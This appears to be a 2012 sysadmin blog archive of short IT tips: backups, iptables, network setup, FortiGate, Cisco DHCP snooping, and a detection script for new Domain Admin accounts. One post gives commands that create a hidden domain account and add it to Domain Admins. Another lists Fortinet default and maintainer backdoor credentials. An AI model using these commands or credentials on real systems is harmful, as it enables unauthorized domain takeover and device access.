Monday, November 26, 2012

What are the different file types created with Symantec System Recovery 2011?

Problem



After completing backups, you need to understand which files relate to incremental and full backups.

Solution



.v2i  - Base or Full Backup recovery point image. This can be created from a baseline or Independent Backup.
 
.iv2i - Incremental image. An incremental includes changes since the last incremental was performed or since the BASE.
 
.sv2i - System Restore File.   Each time a backup image is created, a system index file is saved along with it.
 
The system index file (.sv2i) is created when a backup operation is performed that has multiple drives or a recovery point set (base and incremental backups). A system index file reduces the amount of time that is needed to restore the drives. When a recovery point is created, a system index file is saved with it. The system index file contains a list of the most recent recovery points, which includes the original drive location of each recovery point.
 
.fbf - File Folder Backups. 
 
Recovery Point Set definition: A recovery point set is defined as the Base + all incrementals associated with that Base.
 
  • For example:  if you create a Base backup on the first of each month and incrementals once per week, you will have 5 backup images (one base and 4 incrementals) at the end of the month. All 5 of these images comprise one recovery point set.
 
  • Recovery Point Set Example:
C_Drive001.v2i (Base backup for recovery point set #1)
C_Drive001_i001.iv2i (incremental backup #1 for recovery point set #1)
C_Drive001_i002.iv2i (Incremental backup #2 for recovery point set #1)
C_Drive002.v2i (Base backup for recovery point set #2)
C_Drive002_i001.iv2i (Incremental backup #1 for recovery point set #2)
 
By default, scheduled independent recovery point file names and recovery point
set file names are appended with 001.v2i, 002.v2i, and so forth.
 
Incremental recovery point file names within a set are appended with _i001.iv2i, _i002.iv2i,
and so forth. For example, if your base recovery point is called Server001.v2i,
the first incremental recovery point is called Server001_i001.iv2i.
 

Thursday, November 22, 2012

Add, delete the rule in Chain INPUT (policy ACCEPT)

Add the rule in Chain INPUT (policy ACCEPT)
sudo iptables -A INPUT -p tcp --dport ssh -j ACCEPT
sudo iptables -A INPUT -p tcp --dport http -j ACCEPT
sudo iptables -A INPUT -p tcp --dport ftp -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 65020 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 65030 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 65020:65030 -j ACCEPT


Delete the rule
iptables -D INPUT -p tcp --dport 65020 -j ACCEPT
iptables -D INPUT -p tcp --dport 65030 -j ACCEPT


iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

This is the rule that does most of the work, and again we are adding (-A) it to the INPUT chain. Here we're using the -m switch to load a module (state). The state module is able to examine the state of a packet and determine if it is NEW, ESTABLISHED or RELATED. NEW refers to incoming packets that are new incoming connections that weren't initiated by the host system. ESTABLISHED and RELATED refer to incoming packets that are part of an already established connection or related to an already established connection.

ref: http://wiki.centos.org/HowTos/Network/IPTables
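
With the INPUT policy left at ACCEPT, as in the heading above, the appended ACCEPT rules do not filter anything. The following added example (not from the original post or the CentOS wiki) generates an iptables-restore ruleset with a default DROP policy, places the ESTABLISHED,RELATED rule ahead of the per-port rules, and validates port arguments; the function names and the loopback rule are assumptions of this sketch.

```shell
#!/usr/bin/env bash
# Added example: emits an iptables-restore ruleset on stdout. Nothing is
# applied to the running firewall by this script.

# valid_port_spec SPEC -> success if SPEC is "N" or "LO:HI", 1 <= LO <= HI <= 65535
valid_port_spec() {
    local spec=$1 lo hi
    case $spec in
        *:*) lo=${spec%%:*}; hi=${spec#*:} ;;
        *)   lo=$spec; hi=$spec ;;
    esac
    # Reject empty halves and anything that is not purely digits.
    [ -n "$lo" ] && [ -n "$hi" ] || return 1
    case "$lo$hi" in *[!0-9]*) return 1 ;; esac
    [ "${#lo}" -le 5 ] && [ "${#hi}" -le 5 ] || return 1
    [ "$((10#$lo))" -ge 1 ] && [ "$((10#$hi))" -le 65535 ] &&
        [ "$((10#$lo))" -le "$((10#$hi))" ]
}

# emit_input_ruleset PORTSPEC... -> ruleset text, or failure on a bad spec
emit_input_ruleset() {
    local spec
    # Validate everything first so a bad argument never yields a partial ruleset.
    for spec in "$@"; do
        valid_port_spec "$spec" || { echo "invalid port spec: $spec" >&2; return 1; }
    done
    echo '*filter'
    echo ':INPUT DROP [0:0]'      # default policy: drop what no rule accepts
    echo ':FORWARD DROP [0:0]'
    echo ':OUTPUT ACCEPT [0:0]'
    echo '-A INPUT -i lo -j ACCEPT'
    # Replies to connections this host opened, and related traffic, come first.
    echo '-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'
    for spec in "$@"; do
        # Only NEW connections to the listed TCP ports are let in.
        echo "-A INPUT -p tcp -m tcp --dport $spec -m state --state NEW -j ACCEPT"
    done
    echo 'COMMIT'
}

# state_rule_first: ruleset on stdin; succeeds only if the ESTABLISHED,RELATED
# rule appears before the first --dport rule.
state_rule_first() {
    awk '/--state ESTABLISHED,RELATED/ && !s { s = NR }
         /--dport/ && !d { d = NR }
         END { exit !(s && (!d || s < d)) }'
}

# Ports taken from the rules on this page: ssh, http, ftp and 65020:65030.
emit_input_ruleset 22 80 21 65020:65030
```

Piping the output to `iptables-restore --test` parses the ruleset without committing it.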

Add a static IP to a Redhat/Fedora/CentOS box

To edit/create first NIC file, type command:
# vi /etc/sysconfig/network-scripts/ifcfg-eth0

Append/modify as follows:

DEVICE=eth0
BOOTPROTO=static
DHCPCLASS=
HWADDR=00:30:48:56:A6:2E
IPADDR=10.10.29.66
NETMASK=255.255.255.192
ONBOOT=yes

Add / setup a new route
# route add default gw 192.168.1.254 eth0

Setup DNS Server as follows:
# vi /etc/resolv.conf

nameserver 10.0.80.11
nameserver 10.0.80.12
nameserver 202.67.222.222

ref: 
Linux change ip address
http://www.cyberciti.biz/faq/linux-change-ip-address/

Howto Red hat enterprise Linux 5 configure the network card
http://www.cyberciti.biz/faq/rhel-centos-fedoracore-linux-network-card-configuration/

Linux setup default gateway with route command
http://www.cyberciti.biz/faq/linux-setup-default-gateway-with-route-command/

Wednesday, November 21, 2012

Command to check SELinux status

cat /etc/sysconfig/selinux

Fully Disabling SELinux

1. vi /etc/selinux/config
2. Change the SELINUX line to SELINUX=disabled
3. When done editing, press “ESC”
4. Type “:” and you will get the option to type a command.
5. Type “w” and press Enter to save
6. Type “:” to get the option to type a command, then type “q” and press Enter to exit

Friday, November 16, 2012

VMware Virtual Machine Hardware Versions

This table lists VMware products and their virtual hardware version:

Virtual Hardware Version    Products
9                           ESXi 5.1, Fusion 5.x, Workstation 9.x, Player 5.x
8                           ESXi 5.x, Fusion 4.x, Workstation 8.x, Player 4.x
7                           ESXi/ESX 4.x, Fusion 3.x, Fusion 2.x, Workstation 7.x, Workstation 6.5.x, Player 3.x, Server 2.x
6                           Workstation 6.0.x
4                           ACE 2.x, ESX 3.x, Fusion 1.x, Player 2.x
3 and 4                     ACE 1.x, Lab Manager 2.x, Player 1.x, Server 1.x, Workstation 5.x, Workstation 4.x
3                           ESX 2.x, GSX Server 3.x


refer: http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=1003746

Thursday, November 15, 2012

Separating First and Last Names Using Formulas





The example shows how to use RIGHT, LEFT, and FIND to separate first and last names.

Linux: Iptables Allow MYSQL server incoming request on port 3306

Open port 3306

In most cases the following simple rule opens TCP port 3306:
iptables -A INPUT -i eth0 -p tcp -m tcp --dport 3306 -j ACCEPT

Reference: http://www.cyberciti.biz/tips/linux-iptables-18-allow-mysql-server-incoming-request.html

Wednesday, October 31, 2012

VMware - Failed to Lock the File - Cannot Open The disk VMDK or one of the snapshot disks it depends on

Resolution: To solve this issue I opened the folder that has my virtual machine files. I found a couple of folders that are named ***.lck. I selected them all and deleted them. You can also try to rename them if you are not comfortable with deleting them.

ref: http://blog.laksha.net/2009/10/vmware-failed-to-lock-file-cannot-open.html

Wednesday, September 26, 2012

Network Policy Server Log Location

In general, the Microsoft Network Policy Server log is located at:

C:\Windows\System32\LogFiles\INXXXXXX.log

Friday, September 14, 2012

CFG_CMDBAPI_ERR

The cause of "CFG_CMDBAPI_ERR" may be related to conserve mode. Conserve mode is triggered when the unit has high memory usage.

Technical Note : Discussion of regular conserve mode and kernel conserve mode

Wednesday, July 25, 2012

Active Directory : You do not have sufficient privileges to delete Organizational Unit

Step 1:
Click on : View > Advanced Features

Step 2:
Right-click the OU you want to remove, and then click Properties;
Click the Object tab;
Uncheck the box Protect object from accidental deletion.

Tuesday, July 17, 2012

Configure Cisco switch telnet login and password

1.) Connect console cable
2.) Use terminal emulation program to connect to switch or router. The default settings should be: Bits Per Second: 9600, Data Bits: 8, Parity: None, Stop Bits: 1, Flow Control: None. Connect
3.) Enter Privileged Exec mode by typing enable. A “>” prompt indicates “user” mode; the Exec mode prompt is “#”.
4.) Enter configure terminal mode by typing configure terminal after enable (while in exec/privileged mode), or config t for short.
5.) Type in line vty 0 15 (meaning virtual telnet lines 0 – 15, 16 in all. You can set different passwords for different vtys; the command is not limited to the range 0 15.)
6.) Type “password *password*”, where the text between the asterisks is the password you want to set.

DHCP Snooping


DHCP snooping acts like a firewall between untrusted hosts and DHCP servers. You use DHCP snooping to differentiate between untrusted interfaces connected to the end user and trusted interfaces connected to the DHCP server or another switch. When a switch receives a packet on an untrusted interface and the interface belongs to a VLAN that has DHCP snooping enabled, the switch compares the source MAC address and the DHCP client hardware address. If the addresses match (the default), the switch forwards the packet. If the addresses do not match, the switch drops the packet. The switch drops a DHCP packet when one of these situations occurs:
  • A packet from a DHCP server, such as a DHCPOFFER, DHCPACK, DHCPNAK, or DHCPLEASEQUERY packet, is received from outside the network or firewall.
  • A packet is received on an untrusted interface, and the source MAC address and the DHCP client hardware address do not match.
  • The switch receives a DHCPRELEASE or DHCPDECLINE broadcast message that has a MAC address in the DHCP snooping binding database, but the interface information in the binding database does not match the interface on which the message was received.
  • A DHCP relay agent forwards a DHCP packet, which includes a relay-agent IP address that is not 0.0.0.0, or the relay agent forwards a packet that includes option-82 information to an untrusted port.
Refer to DHCP Snooping Configuration Guidelines for the guidelines on how to configure DHCP snooping.

Note: For DHCP snooping to function properly, all DHCP servers must be connected to the switch through trusted interfaces.

Note: In a switch stack with Catalyst 3750 Switches, DHCP snooping is managed on the stack master. When a new switch joins the stack, the switch receives DHCP snooping configuration from the stack master. When a member leaves the stack, all DHCP snooping bindings associated with the switch age out.

Note: In order to ensure that the lease time in the database is accurate, Cisco recommends that you enable and configure NTP. If NTP is configured, the switch writes binding changes to the binding file only when the switch system clock is synchronized with NTP.

Rogue DHCP servers can be mitigated by DHCP snooping features. The ip dhcp snooping command is issued in order to enable DHCP snooping globally on the switch. When configured with DHCP snooping, all ports in the VLAN are untrusted for DHCP replies. Here, only the FastEthernet interface 1/0/3 connected to the DHCP server is configured as trusted.

DHCP Snooping
Cat3750#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
Cat3750(config)#ip dhcp snooping
 
 
!--- Enables DHCP snooping on the switch.
 
Cat3750(config)#ip dhcp snooping vlan 1
 
 
!--- DHCP snooping is not active until DHCP snooping is enabled on a VLAN.
 
Cat3750(config)#no ip dhcp snooping information option
 
!--- Disable the insertion and removal of the option-82 field, if the  
!--- DHCP clients and the DHCP server reside on the same IP network or subnet.
 
Cat3750(config)#interface fastEthernet 1/0/3
Cat3750(config-if)#ip dhcp snooping trust
 
!--- Configures the interface connected to the DHCP server as trusted.
 
Cat3750#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
1
Insertion of option 82 is disabled
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Interface                    Trusted     Rate limit (pps)
------------------------     -------     ----------------
FastEthernet1/0/3            yes         unlimited
 
!--- Displays the DHCP snooping configuration for the switch.
 
Cat3750#show ip dhcp snooping binding
MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
------------------  ---------------  ----------  -------------  ----  --------------------
00:11:85:A5:7B:F5   10.0.0.2         86391       dhcp-snooping  1     FastEthernet1/0/1
00:11:85:8D:9A:F9   10.0.0.3         86313       dhcp-snooping  1     FastEthernet1/0/2
Total number of bindings: 2
 
!--- Displays the DHCP snooping binding entries for the switch.
 
Cat3750#
 
!--- DHCP server(s) connected to the untrusted port will not be able 
!--- to assign IP addresses to the clients.
Refer to Configuring DHCP Features for more information.
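
The drop conditions listed above can be read as a decision procedure. The following added example (not Cisco code and not from the original post) is a simplified model of them, using the binding table and trusted port from the output on this page; the function names, the rule that trusted ports bypass all checks, and the treatment of a non-zero relay-agent address on an untrusted port are assumptions of this sketch.

```shell
#!/usr/bin/env bash
# Added example: simplified model of the DHCP snooping drop rules above.
# Binding table taken from the "show ip dhcp snooping binding" output on this
# page, as: MAC IP interface.
BINDINGS='00:11:85:A5:7B:F5 10.0.0.2 FastEthernet1/0/1
00:11:85:8D:9A:F9 10.0.0.3 FastEthernet1/0/2'
TRUSTED_PORTS='FastEthernet1/0/3'   # the port facing the DHCP server

is_trusted() { printf '%s\n' $TRUSTED_PORTS | grep -qxF -- "$1"; }

# bound_iface MAC -> interface recorded for MAC in the binding table, or empty
bound_iface() {
    printf '%s\n' "$BINDINGS" |
        awk -v m="$1" 'toupper($1) == toupper(m) { print $3 }'
}

upper() { printf '%s' "$1" | tr 'a-f' 'A-F'; }

# snoop_verdict IFACE MSGTYPE SRC_MAC CHADDR [GIADDR]
# Prints "forward" or "drop: <reason>".
snoop_verdict() {
    local iface=$1 msg=$2 src=$3 chaddr=$4 giaddr=${5:-0.0.0.0} bound
    # Assumption: packets arriving on a trusted port are not checked.
    if is_trusted "$iface"; then echo forward; return; fi
    case $msg in
        DHCPOFFER|DHCPACK|DHCPNAK|DHCPLEASEQUERY)
            echo "drop: server message on untrusted port"; return ;;
    esac
    if [ "$giaddr" != 0.0.0.0 ]; then
        echo "drop: relay-agent address set on untrusted port"; return
    fi
    # Default hwaddr verification: Ethernet source must equal DHCP chaddr.
    if [ "$(upper "$src")" != "$(upper "$chaddr")" ]; then
        echo "drop: source MAC differs from client hardware address"; return
    fi
    case $msg in
        DHCPRELEASE|DHCPDECLINE)
            bound=$(bound_iface "$chaddr")
            if [ -n "$bound" ] && [ "$bound" != "$iface" ]; then
                echo "drop: binding is on $bound, not $iface"; return
            fi ;;
    esac
    echo forward
}

# Constructed packets: a server reply from an access port, and a release for
# the 10.0.0.2 lease arriving on the wrong port.
snoop_verdict FastEthernet1/0/2 DHCPOFFER 00:0C:29:00:00:01 00:11:85:A5:7B:F5
snoop_verdict FastEthernet1/0/2 DHCPRELEASE 00:11:85:A5:7B:F5 00:11:85:A5:7B:F5
```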

Monday, July 16, 2012

Fortinet Default Account

User Name     Password        Description
admin         (none)          Admin access (Telnet)
maintainer    bcpb+serial#    serial# has to be in caps; Admin access (Console)
maintainer    admin           Admin access (Console)


ref: http://www.default-password.info/fortinet/

Fortigate Command - Setting back to factory defaults using the console cable

Connect with a terminal program (like hyperterminal or putty)
connect with these settings:
8 bits
no parity
1 stop bit
9600 baud (the FortiGate-300 uses 115,000 baud)
Flow Control = None

log in as admin (perhaps with no password - perhaps with a password you set)

run this from the CLI:
exec factoryreset

ref: http://t-solve.blogspot.hk/2010/06/setting-fortigate-back-to-factory.html

Symantec Communications Brief - Symantec Customers Experiencing Blue Screen Issues


Dear Customers,


On 11 July night, we found a defect on SEP 12.1 VD, which might cause some Win XP machines Blue Screen Of Death issue.

Below is the whole story and how to avoid the issue and what’s the work around for your reference.


Problem
On July 11th, 2012 at approximately 22.30 PST, Symantec started receiving reports of customers experiencing blue screens after applying Antivirus Definitions July 11th revision 18 and Proactive Threat Protection Definitions July 11th rev 11. Machines may continue to blue screen after they reboot. This problem only appears to occur on Windows XP machines running SEP 12.1.
Error
Blue screen (BSOD) with code 0x000000CB after installing the definitions from 11/07/2012 rev. 11 or rev. 18
Environment
SEP 12.1 Systems on Windows XP 32 bit and 64 bit
Cause
Symantec has reproduced the problem and is now trying to identify the root cause. We have posted updated signatures which resolve the issue to the public LiveUpdate production servers.
Solution
Symantec has posted updated signatures which resolve the issue to the public LiveUpdate production servers. To work around the issue please follow these steps on the impacted machines.
For Enterprise customers, make sure you have updated to the latest virus definitions on the Symantec Endpoint Protection Manager(SEPM)
1. Open the Symantec Endpoint Protection Manager
2. Login
3. Select "Admin"
4. Select "Local site"
5. Select "Download LiveUpdate content"

On affected client machines running Symantec Endpoint Protection 12.1
1. Start computer in safe mode
2. Navigate to the Symantec Endpoint Protection definition directory: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\CurrentVersion\Data\Definitions\BASHDefs
3. Delete the latest content directory (should be 20120711.011)
4. Reboot

Note: If the client is pulling down content from LiveUpdate or LiveUpdate Administrator, please run LiveUpdate. If the client is pulling down content from the SEPM, the content will be automatically downloaded without any interaction. Until the content is delivered, the client UI may show with a warning due to missing content.
When the system has been updated properly, in the client user interface for Proactive Threat Protection the definition versions will be Wednesday, July 11, 2012 r12.


Thanks & Regards,
Linda


Thursday, July 12, 2012

How to attack a windows domain

Code:
C:\net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.
 
The command completed successfully.
Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.
At this point we have control over the domain and can likely log into any workstation which is on the domain.
Code:
C:\net group “domain admins” hacked /add /domain
net group “domain admins” hacked /add /domain
The request will be processed at a domain controller for domain blackhat.com
 
The command completed successfully.
ref: http://www.coresec.org/2011/03/27/how-to-attack-a-windows-domain/
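
On the defending side, both steps above leave records in the domain controller's Security log: event 4720 (a user account was created) and event 4728 (a member was added to a security-enabled global group, which Domain Admins is). The following added example (not from the original post) flags accounts that are created and then added to Domain Admins within a time window; the comma-separated export format, the function names and the sample events are constructed for this sketch.

```shell
#!/usr/bin/env bash
# Added example. Assumed input, one event per line (constructed export format):
#   epoch_seconds,event_id,actor,member_sid,group_name
# 4720 = user account created; 4728 = member added to a global security group.

# flag_fast_privileged_adds WINDOW_SECONDS   (events on stdin, oldest first)
# Prints "member_sid created_by added_by delay_seconds" for every account that
# was created and then added to Domain Admins within WINDOW_SECONDS.
flag_fast_privileged_adds() {
    awk -F, -v win="$1" '
        $2 == 4720 { created[$4] = $1; creator[$4] = $3; next }
        $2 == 4728 && tolower($5) == "domain admins" && ($4 in created) {
            delay = $1 - created[$4]
            if (delay >= 0 && delay <= win)
                print $4, creator[$4], $3, delay
        }'
}

# Constructed sample data, not real logs.
sample_events() {
    cat <<'EOF'
1342051200,4720,CORP\helpdesk1,S-1-5-21-1111-2222-3333-1601,
1342051260,4728,CORP\helpdesk1,S-1-5-21-1111-2222-3333-1601,Domain Admins
1342054800,4720,CORP\hr-sync,S-1-5-21-1111-2222-3333-1602,
1342054900,4728,CORP\hr-sync,S-1-5-21-1111-2222-3333-1602,Sales Staff
1342058400,4728,CORP\admin2,S-1-5-21-1111-2222-3333-1105,Domain Admins
EOF
}

# Only the first account is reported: created and made a Domain Admin 60 s later.
# The third is a long-standing account (no 4720 in the data), so it is not flagged.
sample_events | flag_fast_privileged_adds 3600
```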

Friday, July 6, 2012

Windows 7 Does Not Detect My DVD ROM Drive

To do this, follow these steps:
  1. Open Registry for editing (Regedit.exe).
  2. Locate, and then click the following registry sub key:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}
    Caution 
    To make sure that you are in the appropriate registry sub key, make sure that the Default data value is DVD/CD-ROM and the Class data value is CDROM. 

  3. In the right pane, right-click UpperFilters, and then click Delete.
  4. Click Yes to confirm the removal of the UpperFilters registry entry.
  5. Do the same for the LowerFilters entry.
  6. Exit Registry Editor, and then restart the computer.
That's it. The CD/DVD drive should now be working as expected.

Monday, June 18, 2012

Remote Server Administration Tools for Windows 7 Service Pack 1 (SP1)



To install the Administration Tools pack by using the Windows interface
  1. Download the Administration Tools package from the Microsoft Web site (http://go.microsoft.com/fwlink/?LinkID=137379).
  2. Open the folder into which the package downloaded, double-click the package to unpack the files, and then start the Remote Server Administration Tools Setup Wizard.
    Note

    You must accept the License Terms and Limited Warranty to install Administration Tools.
  3. Complete all the steps that are required by the wizard, and then click Finish to exit the wizard when installation is completed.
  4. Click Start, click Control Panel, and then click Programs.
  5. In the Programs and Features area, click Turn Windows features on or off.
    If you are prompted by User Account Control to allow the Windows Features dialog box to open, click Continue.
  6. In the Windows Features dialog box, expand Remote Server Administration Tools.
  7. Select the remote management tools that you want to install, and then click OK.
  8. Configure the Start menu to display the Administration Tools shortcut, if it is not already there.
    1. Right-click Start, and then click Properties.
    2. On the Start Menu tab, click Customize.
    3. In the Customize Start Menu dialog box, scroll down to System Administrative Tools, and then select Display on the All Programs menu and the Start menu. Click OK.
      Shortcuts for snap-ins installed by Remote Server Administration Tools for Windows 7 are added to the Administrative Tools list on the Start menu.

http://www.microsoft.com/zh-tw/download/details.aspx?id=7887

Tuesday, June 12, 2012

Windows 7 language packs

How to install a Windows 7 language pack and How to change the interface of Windows 7 after a language pack is installed

ref: http://support.microsoft.com/kb/972813

Wednesday, June 6, 2012

Crypto Exception: error:02001005

Problem: general system error occurred: Crypto Exception: error:02001005:system library:fopen:Input/output error:unable to load C:\ProgramData\VMware\VMware vCenter Converter Standalone\ssl\rui.crt

Solution:
 Go to "C:\ProgramData\VMware\VMware vCenter Converter Standalone\" and grant access rights on the "SSL" folder.


ref: http://communities.vmware.com/message/1870752

Wednesday, May 30, 2012

FortiGate - Set Allowaccess

The command for  "Set Allowaccess"

config system interface
edit port8
set ip 10.11.101.102/24
set allowaccess https ping ssh snmp
end

FortiGate Console

To connect to the CLI using a local serial console connection

1 Using the null modem or RJ-45-to-DB-9 cable, connect the FortiGate unit’s console
port to the serial communications (COM) port on your management computer.

2 On your management computer, start HyperTerminal.

3 For the Connection Description, enter a Name for the connection, and select OK.

4 On the Connect using drop-down list box, select the communications (COM) port on
your management computer you are using to connect to the FortiGate unit.

5 Select OK.

6 Select the following Port settings and select OK.

Bits per second: 9600
Data bits: 8
Parity: None
Stop bits: 1
Flow control: None

7 Press Enter or Return on your keyboard to connect to the CLI.

8 Type a valid administrator account name (such as admin) and press Enter.

9 Type the password for that administrator account and press Enter. (In its default state,
there is no password for the admin account.)
The CLI displays the following text:

Welcome!
Type ? to list available commands.
You can now enter CLI commands, including configuring

Wednesday, May 16, 2012

Error E0BB014B: Volume not found

Restoring Dynamic Disks in the Backup Exec System Recovery (BESR) and Symantec System Recovery (SSR) Symantec Recovery Environment (SRD).

Problem


Restoring Dynamic Disks in the Backup Exec System Recovery (BESR) and Symantec System Recovery (SSR) Symantec Recovery Environment (SRD).

Error


When a non-system disk is restored, Disk Management in Windows can be used to convert the disk to dynamic. In some cases, it might be necessary to restore and preserve a Microsoft Dynamic Disk Volume from within the SRD using the Microsoft tool DISKPART.

Solution


The process below is written for non-system disks. If you are restoring an operating system volume, the option to make the partition bootable may be grayed out in the SRD restore wizard. If this is the case, that partition should be restored (it will restore as a simple volume), booted into Windows, and Windows Disk Management used to convert the volume back to dynamic.
CAUTION: Be aware that the following steps DELETE all volumes and data on the entire disk/drive/array.

    1. Boot the system using the Symantec Recovery Disk (SRD) CD. 
    2. From the main menu select Analyze then Open Command Shell.
    3. In the command prompt type Diskpart and press Enter.
    4. Type List Disk and press Enter to list the available disks on this system.
    5. Note the disk number of the volume to create dynamic disks upon. 
    WARNING: If removable disks are present, disconnect them to prevent possible data loss. After disconnecting them, type rescan and press Enter. Return to step 4.

    6. Type Sel Disk # and press Enter; where # is the number of the disk from step 5.

    WARNING: 
    If you are sure the correct disk is selected, proceed to the next step. The next step will wipe all information on the selected disk.

    7. Type Clean and press Enter; a message indicating the disk was successfully cleaned should appear.
    8. Type create partition primary and press Enter; a message indicating the primary partition was created should appear.
    9. Type convert dynamic and press Enter; a message indicating that the conversion was successful appears.
    10. Start the recovery wizard, restore the recovery point to the "unknown" volume; dynamic disks appear as "unknown" within SRD. 
    11. Reboot out of the SRD.
    12. In Windows, right-click My Computer and choose Manage from the context menu.
    13. Click Disk Management then right click on the foreign Disk; the disk to which the recovery point was just restored.
    14. Select import Foreign Disks | Assign and choose the appropriate drive letter.
     
ref: http://www.symantec.com/business/support/index?page=content&id=TECH69331

Wednesday, May 9, 2012

SAS vs. SATA Differences, Technology and Cost

Here are the high-level differences between SAS and SATA disk drives:
Capacity:
  • SATA disk drives are the largest on the market.  The largest SATA drives available with widespread distribution today are 1.5TB-2TB.
  • SAS disk drives are typically smaller than SATA.  The largest SAS drives available with widespread distribution today are 450GB.
  • So, for capacity, a SATA disk drive is 3X-4X as dense as a SAS drive.
  • A good way to quantify capacity comparison is $/GB.  SATA will have best $/GB.
Performance:
  • SATA disk drives spin at 7.2k RPMs.  Average seek time on SATA is 9.5msec.  Raw Disk IOPS (IOs per second) are 106.
  • SAS disk drives spin at 15k RPMs.  Average seek time on SAS is 3.5msec.  Raw Disk IOPS (IOs per second) are 294.
  • So, for performance, a SAS hard drive is nearly 3X as fast as SATA.
  • A good way to quantify performance comparison is $/IOP.  SAS will have best $/IOP.
Reliability: there are two reliability measures – MTBF and BER.
  • MTBF is mean time between failures.  MTBF is a statistical measure of drive reliability.
  • BER is Bit Error Rate.  BER is a measure of read error rates for disk drives.
  • SATA drives have a MTBF of 1.2 million hours.  SAS drives have a MTBF of 1.6 million hours.  SAS drives are more reliable than SATA when looking at MTBF.
  • SATA drives have a BER of 1 read error in 10^15 bits read.  SAS drives have a BER of 1 read error in 10^16 bits read.  SAS drives are 10x more reliable for read errors.  Keep in mind a read error is data loss without other mechanisms (RAID or Network RAID) in place to recover the data.
ref: http://blog.lewan.com/2009/09/14/sas-vs-sata-differences-technology-and-cost/